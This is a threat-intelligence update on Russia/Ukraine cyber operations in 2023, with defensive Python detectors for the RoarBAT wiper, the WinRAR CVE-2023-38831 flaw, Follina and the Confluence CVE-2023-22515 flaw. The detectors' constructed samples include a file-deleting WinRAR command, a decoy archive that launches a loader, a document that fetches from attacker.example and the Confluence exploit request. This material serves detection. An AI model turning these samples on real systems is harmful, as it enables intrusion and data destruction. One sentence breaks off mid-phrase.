Russia/Ukraine Update - December 2023

December 6, 2023

The Russia/Ukraine war is approaching its second anniversary, and both kinetic and cyber warfare continue. Ukraine has continued to pursue defensive strategies, while cybercriminal and hacktivist groups have persisted in launching DDoS, information-stealing, and wiper attacks. Russia has launched further attacks while dealing with internal struggles. The war has caused a ripple effect of destruction and disruption across the world, including a persistent impact on the cybercriminal landscape.


Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian actions as well as estimated cyber-related implications in advisories and Optiv blog posts on February 4, February 22, February 24, June 30, August 25, September 29, October 31, November 29, December 20, March 02, 2023, May 30, 2023 and August 25, 2023. This update will provide information on the events of the previous 90 days and what we can expect looking forward.


This will be the last quarterly update related to the ongoing Russia/Ukraine conflict. Optiv’s gTIC will provide updates via blog posts and advisories on an ad-hoc basis.




In June 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) warned that the Russia-linked threat group APT28 (aka BlueDelta, Sofacy, Pawn Storm, Fancy Bear, Forest Blizzard, FROZENLAKE) had conducted phishing campaigns whose emails were crafted to exploit vulnerabilities in Roundcube webmail servers (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run reconnaissance and exfiltrate sensitive data. The injected scripts redirected incoming email and harvested session cookies, user information, and address books. CERT-UA reported that phishing emails were sent to more than 40 government organizations.


In October 2023, CERT-UA shared that threat actors tracked as UAC-0165 had “interfered” with at least 11 Ukrainian telecommunications organizations between May and September 2023, leading to service interruptions that impacted customers. The threat group conducted reconnaissance and post-exploitation activities from previously compromised servers and used two programs, POEMGATE and POSEIDON, which enable credential theft and remote control of infected hosts. The group also reportedly used a utility called WHITECAT to erase its forensic trail. Once inside a network, the group attempted to disable network equipment and MikroTik devices, as well as data storage systems.


In May 2023, CERT-UA reported that threat actors tracked as UAC-0006 had conducted a phishing campaign with invoice-themed lures to deploy the SmokeLoader malware from a polyglot file. CERT-UA regards this as a financially motivated operation designed to steal credentials and make unauthorized transfers of funds. In an earlier advisory from April 2023, CERT-UA warned of destructive attacks attributed to UAC-0165 against public sector organizations. The group deployed a batch-script wiper called RoarBAT, which searched for files matching a list of target extensions and then used the legitimate WinRAR utility to archive them with the switch that deletes the source files after archiving, before removing the archives themselves, permanently destroying the data without a traditional wiper binary. CERT-UA attributed UAC-0165 to the Russia-linked Sandworm Team (aka FROZENBARENTS, Seashell Blizzard, Voodoo Bear), which has historically used wiper malware against Ukrainian organizations.
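The RoarBAT technique above turns a signed, legitimate archiver into a wiper, so a detection has to key on how WinRAR is invoked rather than on a malicious binary. As an added example (not code from CERT-UA or Optiv), the Python below scores process-creation events for that pattern: WinRAR's command-line binary run with a delete-after-archive switch (WinRAR's documented -df, -dw and -dr switches), recursively, across many extension wildcards, from a script interpreter. The events are constructed Sysmon-style records, not telemetry from the reported intrusions.

```python
import shlex
from typing import Dict, List

# WinRAR switches that remove the source files once they are archived:
# -df deletes, -dw wipes, -dr moves to the Recycle Bin. Any of them turns the
# archiver into a file destroyer, which is the RoarBAT behaviour.
DESTRUCTIVE_SWITCHES = {"-df", "-dw", "-dr"}
WINRAR_IMAGES = {"rar.exe", "winrar.exe"}
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry from the CERT-UA report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"Rar.exe a -r -ep1 -df -inul C:\Temp\out.rar *.doc *.docx *.xls *.pdf"},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" a "C:\Users\jdoe\Documents\Q3.rar" "C:\Users\jdoe\Documents\Q3"'},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"Rar.exe a -dw D:\backup\logs.rar D:\logs\*.log"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline: str) -> List[str]:
    # Windows command lines are not POSIX; posix=False keeps quoted paths
    # together and leaves backslashes alone, which is enough to read switches.
    return shlex.split(cmdline, posix=False)


def score_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Flag WinRAR archive-and-delete runs; the score grows with each wiper trait."""
    if _basename(ev.get("Image", "")) not in WINRAR_IMAGES:
        return {"suspicious": False, "score": 0, "reasons": []}
    toks = _tokens(ev.get("CommandLine", ""))
    switches = {t.lower() for t in toks if t.startswith("-")}
    destructive = switches & DESTRUCTIVE_SWITCHES
    reasons: List[str] = []
    if destructive:
        reasons.append("delete/wipe-after-archive switch " + ", ".join(sorted(destructive)))
    if "-r" in switches:
        reasons.append("recursive")
    wildcards = [t for t in toks if t.startswith("*.")]
    if len(wildcards) >= 3:
        reasons.append(f"{len(wildcards)} extension wildcards")
    if _basename(ev.get("ParentImage", "")) in SCRIPT_PARENTS:
        reasons.append("spawned from script interpreter")
    # A destructive switch alone is worth an alert; the other traits add confidence.
    return {"suspicious": bool(destructive), "score": len(reasons), "reasons": reasons}


def triage(events: List[Dict[str, str]]) -> List[int]:
    """Indices of events that look like archiver-based destruction."""
    return [i for i, ev in enumerate(events) if score_event(ev)["suspicious"]]


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_event(SAMPLE_EVENTS[i]))
```

A normal interactive WinRAR run from Explorer (the second event) is not flagged even though it archives a whole folder, because it never asks the archiver to delete anything; the switch, not the tool, is the signal.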


In July 2023, CERT-UA shared its discovery of Microsoft Excel (XLS) documents containing a legitimate macro alongside a malicious macro that launches the PicassoLoader malware, which in turn executes njRAT. CERT-UA attributed this activity to UAC-0057 (aka GhostWriter), a threat actor it had also observed sending phishing emails with malicious attachments that exploited CVE-2023-38831 (CVSS 7.8), a vulnerability in the WinRAR archiving software that causes vulnerable versions to execute a script placed in a folder named after a benign-looking decoy file when the user opens the decoy. The adversary’s goal was to deploy a Cobalt Strike beacon followed by PicassoLoader. The use of njRAT, a commodity remote access trojan that has been in circulation for over a decade, demonstrates that threat actors do not need custom or bespoke malware when older, simpler tools and procedures remain effective.
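Because the CVE-2023-38831 lure is a structural trick rather than a malformed file, it can be spotted before the archive is ever opened. As an added example (not code from CERT-UA or Optiv), the Python below inspects a ZIP for the exploit layout: a top-level decoy whose name ends in a space, a directory with exactly the same name, and inside it an executable whose name begins with the decoy's. The sample archives are constructed in memory for demonstration; the executable-extension list is an assumption meant to be extended.

```python
import io
import zipfile
from typing import List, Tuple

# File types Windows will run when the archiver hands them to ShellExecute.
# Assumption: a practical subset, not an exhaustive list.
EXEC_EXTENSIONS = {".cmd", ".bat", ".exe", ".com", ".scr", ".pif", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".ps1", ".lnk", ".hta"}


def find_38831_pattern(archive: bytes) -> List[Tuple[str, str]]:
    """Return (decoy, payload) pairs matching the CVE-2023-38831 layout.

    Patched WinRAR opens the decoy; vulnerable builds resolve the trailing-space
    name to the same-named directory and run the payload inside it instead.
    """
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        members = [i.filename for i in zf.infolist()]
    files = [m for m in members if not m.endswith("/")]
    # Directories may be explicit entries or merely implied by member paths.
    dirs = {m.rstrip("/") for m in members if m.endswith("/")}
    dirs.update(m.rsplit("/", 1)[0] for m in files if "/" in m)

    hits: List[Tuple[str, str]] = []
    for decoy in files:
        if "/" in decoy or not decoy.endswith(" ") or decoy not in dirs:
            continue
        for member in files:
            if not member.startswith(decoy + "/"):
                continue
            base = member.rsplit("/", 1)[1]
            ext = ("." + base.rsplit(".", 1)[1].lower()) if "." in base else ""
            if base.startswith(decoy) and ext in EXEC_EXTENSIONS:
                hits.append((decoy, member))
    return hits


def build_sample(malicious: bool) -> bytes:
    """Constructed archives for demonstration, not samples from the campaign."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if malicious:
            # "Invoice.pdf " (trailing space) next to a directory of the same name
            # holding "Invoice.pdf .cmd": the layout the exploit relies on.
            zf.writestr("Invoice.pdf ", b"%PDF-1.4\n% harmless decoy shown to the user\n")
            zf.writestr("Invoice.pdf /Invoice.pdf .cmd", b"@echo off\r\nstart loader.exe\r\n")
        else:
            zf.writestr("Invoice.pdf", b"%PDF-1.4\n% ordinary document\n")
            zf.writestr("notes/readme.txt", b"nothing to see\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(find_38831_pattern(build_sample(True)))
    print(find_38831_pattern(build_sample(False)))
```

The trailing space is the key: Windows itself will not create such a name, so its presence on a top-level member that also has a same-named directory is almost never legitimate and is cheap to check at a mail gateway or on an upload path.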


In July 2023, security researchers with BlackBerry reported that the threat actors behind the RomCom malware had carried out phishing attacks against Ukraine and supporting countries just before the NATO Summit in Lithuania. The threat actor used this high-profile, Ukraine-specific event as a lure, and researchers discovered a website impersonating the Ukrainian World Congress non-profit organization. The execution chain exploited the Follina remote code execution vulnerability, CVE-2022-30190, in the Microsoft Support Diagnostic Tool (MSDT): a malicious document references an external HTML resource that invokes the ms-msdt: protocol handler to run attacker-supplied commands. Reported in May 2022, this vulnerability remains an attractive attack vector for threat actors of all sophistication levels. Optiv’s gTIC analyzed more than 45 ransomware groups and 26 APT groups across multiple countries, including Russia, North Korea, China, and Iran, and identified 5 ransomware groups and 13 APT groups that have been observed exploiting Follina since its disclosure.
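A Follina document gives itself away inside the OOXML package: the OLE relationship that should point at an embedded part instead points at an external URL, and the fetched page carries an ms-msdt: reference. As an added example (not BlackBerry's or Optiv's code), the Python below unpacks a .docx and checks both tells. The sample document is a constructed minimal package and attacker.example is a placeholder host, neither taken from the RomCom campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# The MSDT protocol handler the Follina chain invokes from the fetched HTML.
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def triage_ooxml(doc: bytes) -> Dict[str, List]:
    """Inspect an OOXML package (docx/xlsx/pptx are ZIPs) for Follina tells:
    an OLE relationship with TargetMode="External", and any literal ms-msdt:
    reference in a part (seen when the payload page is embedded locally)."""
    out: Dict[str, List] = {"external_ole": [], "msdt_refs": []}
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(data)
                except ET.ParseError:
                    continue
                for rel in root.iter(REL_NS + "Relationship"):
                    if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL_TYPE:
                        out["external_ole"].append((name, rel.get("Target", "")))
            if MSDT_RE.search(data):
                out["msdt_refs"].append(name)
    return out


def is_follina_like(doc: bytes) -> bool:
    r = triage_ooxml(doc)
    return bool(r["external_ole"] or r["msdt_refs"])


RELS_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '{extra}'
    '</Relationships>'
)


def build_sample(malicious: bool) -> bytes:
    """Constructed minimal package for demonstration; attacker.example is a placeholder."""
    extra = ""
    if malicious:
        # External OLE target: Word fetches the URL and renders it, which is how
        # the ms-msdt: handler gets triggered.
        extra = ('<Relationship Id="rId9" Type="' + OLE_REL_TYPE + '" '
                 'Target="http://attacker.example/lure.html!" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", RELS_TEMPLATE.format(extra=extra))
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_ooxml(build_sample(True)))
    print(is_follina_like(build_sample(False)))
```

Legitimate documents almost never carry an external OLE relationship, so that check alone is a strong signal; the ms-msdt: scan catches variants that ship the payload page inside the package instead of fetching it.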


In August 2023, Microsoft security researchers reported that Midnight Blizzard (aka Nobelium, APT29, UNC2452, and Cozy Bear) was using Microsoft Teams chats to mount targeted credential-theft campaigns aimed at stealing Microsoft 365 credentials and pivoting into organizations’ Microsoft Entra ID (formerly Azure Active Directory) tenants and other sensitive environments. The group reportedly targeted fewer than 40 global government, technology, manufacturing, and media organizations. Midnight Blizzard used previously compromised Microsoft 365 tenants, renamed with security-themed subdomains, to send social engineering messages while impersonating technical support, and in some cases attempted to register a device in the victim organization’s Entra ID as a managed device. While the victims of these campaigns were located worldwide, there is an Even Chance that future attacks and espionage/information-gathering campaigns carried out by APT29 will be directed toward Ukrainian and NATO countries’ organizations to gather strategic information.


In August 2023, U.S. federal agencies and international partners in the U.K., New Zealand, Australia, and Canada published a report warning that the Sandworm Team threat actor was deploying a new strain of malware called “Infamous Chisel.” This malware, while not highly sophisticated, enables persistent remote access to infected Android devices over the Tor network and the subsequent exfiltration of system information that would be of value to the Russian government.


In September 2023, CERT-UA reported that it stopped a cyberattack attributed to APT28 against an unnamed Ukrainian critical energy infrastructure facility. The attack began with a phishing email that, when clicked by the victim, activated an infection chain and downloaded a malicious ZIP archive. A scheduled task provided persistence, and remote command execution was achieved using cURL through a legitimate service called


In September 2023, Reuters reported that “Russian spies were using hackers to target computer systems at law enforcement agencies in Ukraine in a bid to identify and obtain evidence related to alleged Russian war crimes,” according to Ukraine’s cyber defense chief. Reuters also indicates that these adversaries have increased their targeting of the Ukrainian Prosecutor General’s office and “departments documenting war crimes.” Ukraine’s cyber defense chief reported that the focus of Russia-linked APT groups has shifted from energy facilities to law enforcement agencies, which had previously not been targeted. The purported goal of the campaigns, according to Reuters, was to help Russian individuals “avoid prosecution and move them back to Russia.”


In October 2023, the website of the British royal family suffered a DDoS attack that the Russian-linked threat group, KillNet, claimed responsibility for. The site was down for nearly 90 minutes, and the threat group reportedly did not gain access to its systems, content, or site. The website was targeted days after King Charles condemned the invasion of Ukraine, indicating that the DDoS attack was Likely in retaliation for speaking against the Russian actions. KillNet has previously targeted government websites within Europe, including the European Parliament website after the lawmakers approved a resolution calling Moscow a state sponsor of terrorism in November 2022.



Figure 1: KillNet claimed responsibility for the DDoS attack on the official website of the royal family (Source: Telegram)


In October 2023, a Ukrainian official stated that Russian cyberattacks had become more sophisticated and frequent, with the daily goal of disrupting vital infrastructure. Deputy Foreign Minister Anton Demokhin reported that the cyberattacks, while not as devastating as expected, were consuming significant time, attention, and resources to defend networks and prevent damage and further disruption. Ukraine recorded 3,974 cyber incidents between January 2022 and September 2023, most of them from Russian attackers.


In October 2023, the Cyber Army of Russia Reborn, a Russia-affiliated hacktivist group, openly advertised a “chat admin or moderator” position on cybercriminal forums. The group is widely believed to be modeled on the IT Army of Ukraine and reportedly conducts DDoS attacks on Ukrainian organizations and on government agencies of countries that support Ukraine, claiming geopolitical conflict and tensions as its motivation. It is not clear why the group advertised the position openly on the dark web, but it raises questions for security researchers about the group’s intentions. There is an Even Chance that the advertisement indicates the group is seeking to strengthen its capabilities and expand operations.




The IT Army of Ukraine, a collective with nearly 10,000 volunteers, continues to be active against Russian organizations. The group claimed responsibility for temporarily disabling internet services in some of the territories occupied by the Russian army, reportedly attacking the Russian internet providers Miranda-media, Krimtelekom, and MirTelekom, and has invited supporters to install its software to increase the size of its DDoS botnet. As with most DDoS attacks, the companies mitigated the attacks and restored services within 24 hours.



Figure 2: IT Army of Ukraine claims responsibility for DDoS attacks (Source: Telegram)


In October 2023, Recorded Future indicated that Ukrainian hackers had reportedly teamed up with the nation’s security services, the SBU, to “breach Russia’s largest private bank” and “obtain the data of more than 30 million customers.” These hackers told Recorded Future that they would share this data with journalists.


In October 2023, the Ukrainian Cyber Alliance (UCA), a Ukrainian hacktivist group, infiltrated and disrupted the Trigona ransomware operation. Formed in 2016, the UCA is comprised of volunteers worldwide who purportedly work to defend the country’s cyberspace against Russian attacks. UCA hackers reportedly gained access to the Trigona ransomware infrastructure by leveraging a public exploit for CVE-2023-22515 (CVSS 9.8), a broken access control vulnerability in Confluence Data Center and Server that lets an unauthenticated attacker reset the instance’s setup state and create a new administrator account. UCA maintained persistence and eventually wiped the servers completely.
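The same CVE-2023-22515 chain that the UCA used against Trigona was being used against ordinary Confluence owners at the time, and it leaves a distinctive two-step trail in the web server log: a request to /server-info.action carrying the bootstrapStatusProvider.applicationConfig.setupComplete parameter to reopen setup, followed by requests to the /setup/*.action wizard pages to create an administrator. As an added example (not UCA's exploit and not Optiv's code), the Python below correlates those steps per client in combined-format access logs. The log lines are constructed with RFC 5737 test addresses, not traffic from the operation.

```python
import re
from collections import defaultdict
from typing import Dict

# Constructed combined-log-format lines for demonstration (RFC 5737 addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:09:01:10 +0000] "GET /login.action HTTP/1.1" 200 4821
203.0.113.5 - - [10/Oct/2023:09:02:31 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:09:02:33 +0000] "GET /setup/setupadministrator.action HTTP/1.1" 200 3190
203.0.113.5 - - [10/Oct/2023:09:02:35 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:09:02:40 +0000] "POST /setup/finishsetup.action HTTP/1.1" 302 0
198.51.100.7 - - [10/Oct/2023:09:03:02 +0000] "GET /rest/api/content?limit=25 HTTP/1.1" 200 9144
192.0.2.44 - - [10/Oct/2023:09:05:11 +0000] "GET /setup/setupstart.action HTTP/1.1" 403 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Stage 1: flip the setupComplete flag through the unauthenticated endpoint.
STAGE1 = re.compile(r"^/server-info\.action\?.*bootstrapStatusProvider\.applicationConfig\.setupComplete=", re.I)
# Stage 2: drive the setup wizard, which should never be reachable on a completed instance.
STAGE2 = re.compile(r"^/setup/(setupadministrator|finishsetup|setupstart)\.action", re.I)


def detect_22515(log_text: str) -> Dict[str, Dict[str, object]]:
    """Correlate per client. Both stages from one client: high confidence.
    Either stage alone: medium, still worth a look since setup actions are
    abnormal after installation."""
    per_ip: Dict[str, Dict[str, object]] = defaultdict(lambda: {"stage1": 0, "stage2": 0, "paths": []})
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, path = m.group("ip"), m.group("path")
        if STAGE1.search(path):
            per_ip[ip]["stage1"] += 1
            per_ip[ip]["paths"].append(path)
        elif STAGE2.search(path):
            per_ip[ip]["stage2"] += 1
            per_ip[ip]["paths"].append(path)

    verdicts: Dict[str, Dict[str, object]] = {}
    for ip, rec in per_ip.items():
        level = "high" if rec["stage1"] and rec["stage2"] else "medium"
        verdicts[ip] = {"confidence": level, "stage1": rec["stage1"],
                        "stage2": rec["stage2"], "paths": rec["paths"]}
    return verdicts


if __name__ == "__main__":
    for ip, v in detect_22515(SAMPLE_LOG).items():
        print(ip, v["confidence"], v["paths"])
```

The 403 on the third client's /setup/setupstart.action request does not make it benign: a blocked probe still tells you someone is testing the instance, and the rule reports it at medium confidence rather than dropping it.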



Figure 3: Trigona data leak site


Based on ransomware variant similarities, the Trigona ransomware group is believed to have ties to the Russia-linked Alphv ransomware operation (aka BlackCat). The UCA reported that they would provide decryption keys found in the stolen data and any relevant information to law enforcement agencies.



Other Countries

From August to September 2023, U.S. Cyber Command (CYBERCOM) deployed a team of cyberwarfare specialists to Lithuania, which borders Moscow’s heavily militarized Kaliningrad enclave, to conduct a “defensive hunt operation.” The specialists searched for evidence of malicious activity, and the stated goal of the operation was to “defend the nation in and through cyberspace.” The operation was not conducted to directly benefit Ukraine, but because the same threat actors often conduct operations against NATO countries like Lithuania; Russia-linked cyberattacks targeting NATO countries increased by 300% in 2022. Operations like this one support information sharing and the development of mitigation techniques.


Since the start of the Russia/Ukraine conflict, thousands of people have joined hacktivist and hacker groups. While many of their attacks are DDoS or otherwise unsophisticated, they can still cause disruption and have led to temporary outages of business and operations in critical verticals including banks, pharmacies, hospitals, transportation services, and government operations.


In October 2023, the International Committee of the Red Cross (ICRC) published its first set of rules of engagement for civilian hackers. The rules have been dubbed a “Geneva Code” of cyber warfare and include the following eight quoted rules.


  1. Do not direct cyberattacks against civilian objects.
  2. Do not use malware or other tools or techniques that spread automatically and damage military objectives and civilian objects indiscriminately.
  3. When planning a cyberattack against a military objective, do everything feasible to avoid or minimize the effects your operation may have on civilians.
  4. Do not conduct any cyber operation against medical and humanitarian facilities.
  5. Do not conduct any cyberattack against objects indispensable to the survival of the population or that can release dangerous forces.
  6. Do not make threats of violence to spread terror among the civilian population.
  7. Do not incite violations of international humanitarian law.
  8. Comply with these rules even if the enemy does not.


Both Ukrainian and Russian hacking groups have reported that they will work to de-escalate cyberattacks and comply with the rules that have been proposed. One of the groups, KillNet, reported to BBC News that they agree to the terms and rules, and it should be considered as a first step from the group towards peace. Additionally, the IT Army of Ukraine has vowed to avoid cyberattacks that would impact civilians.


If the commitments to follow these rules are sincere, there will Likely be a reduction in the number of cyberattacks causing disruptions to civilian operations over the next 12 months. However, such pledges have not always held. For example, in 2020, multiple ransomware groups – Maze, REvil, DoppelPaymer, and more – vowed to avoid healthcare organizations during the COVID-19 pandemic, which lasted only a few months before healthcare organizations were targeted again. Therefore, there is an Even Chance that hacker groups will continue to target organizations and cause disruptions that affect civilians over the next 12 months.




In September 2023, the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) released a report covering Russia’s cyber tactics in the first half of 2023. The goal of the report is to help Ukrainian cybersecurity specialists and international partners mitigate and defend against Russia-linked cyberattacks. The report highlighted increased attention from Russia-linked threat actors on law enforcement agencies and on energy and media organizations, and found that the rate of attacks on Ukraine had more than doubled, from roughly 1.9 per day in H2 2022 to 4 to 5 per day in H1 2023: 342 confirmed incidents in the second half of 2022 versus 762 in the first half of 2023, an increase of 123%. The analysis revealed that Russia-linked threat actors often revisit victims that handle and maintain critical data of interest to the Russian military. This report, along with reporting from Mandiant, highlights the increased use of living-off-the-land (LOTL) techniques in Russia-linked cyberattacks.


This type of report can be highly beneficial for information-sharing operations, enabling accurate mitigation techniques and spreading knowledge of group and malware activity. It is Likely that Russia-linked threat groups will continue to target Ukraine and NATO countries, refine their TTPs, and identify ways to conduct more complex and successful attacks over the next 12 months. Over the same period, it is Likely that Russia-linked groups will increasingly focus on evading detection and conducting long-term espionage campaigns against Ukraine and supporting countries to steal sensitive information of strategic value to the Russian government.


Other countries with a history of state-sponsored and/or APT activity that have indirectly aligned with Russia or maintained a conspicuous neutrality include China and India; both could pose additional risk as sources of, or proxies for, cyberattacks. While China has avoided physical involvement in the war, it has maintained an ambiguous balance between suspending and continuing trade and business with Russia. China-linked threat groups have also parroted Russian narratives where they align with China’s criticism of the U.S. Despite their focus on the U.S., there is an Even Chance that these groups could target countries of strategic interest to Russia over the next 12 months.


It is Likely that Russian and Ukrainian hackers will continue to target vulnerabilities in ubiquitous software over the next 12 months. In addition to exploiting multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will continue to target commonly exposed software and abuse legitimate administration and remote-access tools in the coming months, including:


  • RDP
  • SMB/Samba
  • UPnP
  • Oracle WebLogic
  • Microsoft Exchange
  • Microsoft SharePoint
  • VMware - vCenter, ESXi, vSphere, vAccess, Workspace ONE, Horizon
  • VPN clients – Pulse Secure, Fortinet Fortigate, Citrix Gateway
  • Jenkins
  • Atlassian – Jira, Confluence
  • Routers – Asus, MikroTik
  • Content management system (CMS) platforms - WordPress, Joomla!, Drupal, Magento/Adobe Commerce
  • Mimikatz
  • AdFind
  • AnyDesk
  • Rclone
  • Ngrok reverse proxy
  • Zoho ManageEngine
  • LogMeIn
  • TeamViewer


It is Likely that threat actors will continue to use the same tactics observed in cyberattacks attributed to Russia-linked and Russia-supporting groups.


Table 1: MITRE ATT&CK techniques observed in reported cyberattacks related to the Russia/Ukraine conflict


Tactic Technique Description
Reconnaissance T1595.002 Active Scanning: Vulnerability Scanning
T1589.001 Gather Victim Identity Information: Credentials
T1598 Phishing for Information
T1598.003 Phishing for Information: Spearphishing Link
Resource Development T1583.001 Acquire Infrastructure: Domains
T1583.006 Acquire Infrastructure: Web Services
T1608.001 Stage Capabilities: Upload Malware
T1584.001 Compromise Infrastructure: Domains
T1584.003 Compromise Infrastructure: Virtual Private Server
T1584.004 Compromise Infrastructure: Server
T1584.006 Compromise Infrastructure: Web Services
T1586.002 Compromise Accounts: Email Accounts
T1586.003 Compromise Accounts: Cloud Accounts
T1587.001 Develop Capabilities: Malware
T1587.003 Develop Capabilities: Digital Certificates
T1585.001 Establish Accounts: Social Media Accounts
T1588.001 Obtain Capabilities: Malware
T1588.002 Obtain Capabilities: Tool
Initial Access T1566.001 Phishing: Spearphishing Attachment
T1566.002 Phishing: Spearphishing Link
T1566.003 Phishing: Spearphishing via Service
T1190 Exploit Public-Facing Application
T1133 External Remote Services
T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
T1199 Trusted Relationship
T1078 Valid Accounts
T1078.002 Valid Accounts: Domain Accounts
T1078.003 Valid Accounts: Local Accounts
T1078.004 Valid Accounts: Cloud Accounts
T1189 Drive-by Compromise
Execution T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.006 Command and Scripting Interpreter: Python
T1059.007 Command and Scripting Interpreter: JavaScript
T1059.009 Command and Scripting Interpreter: Cloud API
T1559.001 Inter-Process Communication: Component Object Model
T1559.002 Inter-Process Communication: Dynamic Data Exchange
T1106 Native API
T1053.005 Scheduled Task/Job: Scheduled Task
T1204.001 User Execution: Malicious Link
T1204.002 User Execution: Malicious File
T1047 Windows Management Instrumentation
T1651 Cloud Administration Command
T1203 Exploitation for Client Execution
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.003 Boot or Logon Autostart Execution: Time Providers
T1136.001 Create Account: Local Account
T1136.003 Create Account: Cloud Account
T1137 Office Application Startup
T1137.002 Office Application Startup: Office Test
T1098.001 Account Manipulation: Additional Cloud Credentials
T1098.002 Account Manipulation: Additional Email Delegate Permissions
T1098.003 Account Manipulation: Additional Cloud Roles
T1098.005 Account Manipulation: Device Registration
T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription
T1546.013 Event Triggered Execution: PowerShell Profile
T1546.015 Event Triggered Execution: Component Object Model Hijacking
T1556.007 Modify Authentication Process: Hybrid Identity
T1505.003 Server Software Component: Web Shell
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)
T1542.003 Pre-OS Boot: Bootkit
Privilege Escalation T1546.008 Event Triggered Execution: Accessibility Features
T1546.015 Event Triggered Execution: Component Object Model Hijacking
T1068 Exploitation for Privilege Escalation
T1134.001 Access Token Manipulation: Token Impersonation/Theft
T1134.002 Access Token Manipulation: Create Process with Token
Defense Evasion T1055 Process Injection
T1055.012 Process Injection: Process Hollowing
T1140 Deobfuscate/Decode Files or Information
T1564.003 Hide Artifacts: Hidden Window
T1562.001 Impair Defenses: Disable or Modify Tools
T1562.002 Impair Defenses: Disable Windows Event Logging
T1562.004 Impair Defenses: Disable or Modify System Firewall
T1070.004 Indicator Removal: File Deletion
T1070.006 Indicator Removal: Timestomp
T1070.008 Indicator Removal: Clear Mailbox Data
T1112 Modify Registry
T1221 Template Injection
T1027 Obfuscated Files or Information
T1027.001 Obfuscated Files or Information: Binary Padding
T1027.004 Obfuscated Files or Information: Compile After Delivery
T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
T1027.010 Obfuscated Files or Information: Command Obfuscation
T1027.011 Obfuscated Files or Information: Fileless Storage
T1218.005 System Binary Proxy Execution: Mshta
T1218.011 System Binary Proxy Execution: Rundll32
T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
T1484.002 Domain Policy Modification: Domain Trust Modification
T1553.002 Subvert Trust Controls: Code Signing
T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass
T1553.006 Subvert Trust Controls: Code Signing Policy Modification
T1036.001 Masquerading: Invalid Code Signature
T1036.004 Masquerading: Masquerade Task or Service
T1036.005 Masquerading: Match Legitimate Name or Location
T1211 Exploitation for Defense Evasion
T1550.004 Use Alternate Authentication Material: Web Session Cookie
T1014 Rootkit
Credential Access T1528 Steal Application Access Token
T1552.004 Unsecured Credentials: Private Keys
T1110 Brute Force
T1110.001 Brute Force: Password Guessing
T1110.003 Brute Force: Password Spraying
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1555.004 Credentials from Password Stores: Windows Credential Manager
T1621 Multi-Factor Authentication Request Generation
T1606.001 Forge Web Credentials: Web Cookies
T1606.002 Forge Web Credentials: SAML Tokens
T1003.003 OS Credential Dumping: NTDS
T1003.006 OS Credential Dumping: DCSync
T1649 Steal or Forge Authentication Certificates
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting
T1539 Steal Web Session Cookie
Discovery T1083 File and Directory Discovery
T1120 Peripheral Device Discovery
T1057 Process Discovery
T1082 System Information Discovery
